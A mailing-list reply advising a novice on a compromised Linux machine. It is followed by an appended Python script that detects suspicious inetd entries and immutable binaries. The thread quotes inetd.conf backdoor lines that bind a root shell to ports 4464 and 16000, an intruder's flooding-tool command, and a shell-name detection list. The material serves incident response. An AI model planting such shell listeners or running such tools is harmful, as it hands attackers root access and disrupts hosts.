The traceroute to 212.38.131.178 reaches gw0-e1.index.com.jo (212.38.128.250) and then dies. FYI: Country code ".jo" is Jordan.

What version of bind are you running? Your code fragment below looks amazingly like a stealth IRC daemon/server installed via the ADMROCKS exploit on bind.

1- Check /etc/inetd.conf to see if anything extra has been added

This has been added:

  Linuxconf stream tcp wait root /bin/linuxconf -http
  #swat stream tcp nowait.400 root /usr/sbin swat swat
  4464 stream tcp nowait root /bin/sh sh -I
  16000 stream tcp nowait root /usr/sbin/tcpd /bin/sh

2- Run /usr/bin/lsattr against:

  /usr/bin/dig
  /usr/bin/dnsquery
  /usr/bin/du
  /usr/bin/find
  /usr/bin/host
  /usr/bin/nslookup
  /usr/bin/top
  /bin/ls
  /bin/netstat
  /bin/ps
  /bin/login

For each of those files, lsattr should output leading "--------"'s:

  -------- /usr/bin/dig
  -------- /usr/bin/dnsquery
  -------- /usr/bin/du
  -------- /usr/bin/find
  -------- /usr/bin/host
  -------- /usr/bin/nslookup
  -------- /usr/bin/top
  -------- /bin/ls
  -------- /bin/netstat
  -------- /bin/ps
  -------- /bin/login

Everything here looks like the above except for login, which looks like:

  ----i--- /bin/login

If it doesn't, you've been hacked.

3- If you've been hacked, it's almost certain _other_ files have also been installed, parts of your configuration (in /etc) have been tampered with, and other nasty stuff has taken place. If you've been hacked, about your only _secure_ option is to re-install from square-one (remembering to also add security updates provided by your Linux distributor).

To prevent a hacker reinfestation, if your Linux distribution contains an automatically configured firewall, install it. If not, get one (I recommend PMFirewall for newbies, see http://www.pointman.org).

Hope this helps'idly,
-S

Joseph Johnson wrote:
>
> I found this in my history file on a machine that I play around with when I
> decide to try and learn Linux.
>
> (sleep 300 ; killall -9 uh)
> w
> ./uh 0 212.38.131.178 1 65535 /dev/null &
>
> I am pretty much a perpetual newbie. (I do not do this for a living.) I
> know this system's been compromised. Short of reformatting the hard drive I
> am not too sure what to do. Any help would be appreciated.
> Joseph
> josephj at mninter.net

_______________________________________________
tclug-list mailing list
tclug-list at lists.real-time.com
https://mailman.real-time.com/mailman/listinfo/tclug-list
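A small defender-side check for the two items in the advice above (extra /etc/inetd.conf entries that hand out a shell, and immutable attributes on system binaries), written as an added example that is not part of the original thread; the inetd.conf and lsattr lines it parses are constructed samples modelled on the ones quoted in the message, not captured from the poster's machine.

```python
# Constructed sample of /etc/inetd.conf, modelled on the entries quoted in the thread
# (the "4464" and "16000" lines are the ones that bind a root shell to a port).
SAMPLE_INETD = """\
ftp       stream tcp nowait     root /usr/sbin/tcpd  in.ftpd -l -a
linuxconf stream tcp wait       root /bin/linuxconf  -http
#swat     stream tcp nowait.400 root /usr/sbin/swat  swat
4464      stream tcp nowait     root /bin/sh         sh -i
16000     stream tcp nowait     root /usr/sbin/tcpd  /bin/sh
"""

# Constructed sample of lsattr output for some of the binaries the advice lists.
SAMPLE_LSATTR = """\
-------- /usr/bin/dig
-------- /bin/ps
----i--- /bin/login
"""

SHELLS = {"sh", "bash", "csh", "ksh", "tcsh", "zsh"}

def suspicious_inetd_entries(text):
    """(service, reason) pairs for lines worth a second look: a numeric service
    name (a raw port, not a name from /etc/services) or a shell being spawned."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue  # blank lines and comments are inert
        if len(fields) < 6:
            continue  # malformed; inetd would not start anything from it
        service, server, args = fields[0], fields[5], fields[6:]
        if service.isdigit():
            findings.append((service, "numeric service name"))
        # With a wrapper such as tcpd as the server, the real program is the first argument.
        for prog in [server] + args[:1]:
            if prog.rsplit("/", 1)[-1] in SHELLS:
                findings.append((service, "spawns a shell"))
                break
    return findings

def immutable_files(lsattr_text):
    """Paths whose lsattr attribute string carries lowercase 'i' (immutable), which
    the advice above treats as a sign the binary was replaced and pinned in place."""
    pinned = []
    for line in lsattr_text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and "i" in parts[0]:
            pinned.append(parts[1])
    return pinned
```

On a live system, feed it the real file and the real `lsattr` output; anything it reports is a starting point for the re-install decision the advice describes, not proof on its own.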